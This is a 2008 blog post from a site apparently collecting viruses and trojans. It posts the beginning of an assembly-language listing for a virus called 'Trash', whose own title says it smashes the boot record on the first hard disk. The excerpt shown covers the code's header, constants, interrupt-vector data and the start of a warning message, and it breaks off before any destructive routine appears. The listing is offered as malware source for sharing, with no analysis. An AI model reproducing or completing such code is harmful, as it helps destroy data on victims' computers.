..:: Virus Trojan etc ::..

Archive for August 15th, 2008

Listing Virus Trash

Posted by: programmervb on: August 15, 2008

page    ,132
title    Trash – smashes the boot record on the first hard disk
name    TRASH
.radix    16
code    segment
assume    cs:code,ds:code
org    100
CODEX    equ    0C000        ; Or use 0300 when tracing DOS
CR    equ    0Dh
LF    equ    0A
start:
jmp    do_it
oldint1 dd    ?
newintx dd    ?
oldintx dd    ?
trace    db    1
found    db    0
buffer    db    200 dup (0)
message db    CR,LF,’**********  W A R N I N [...]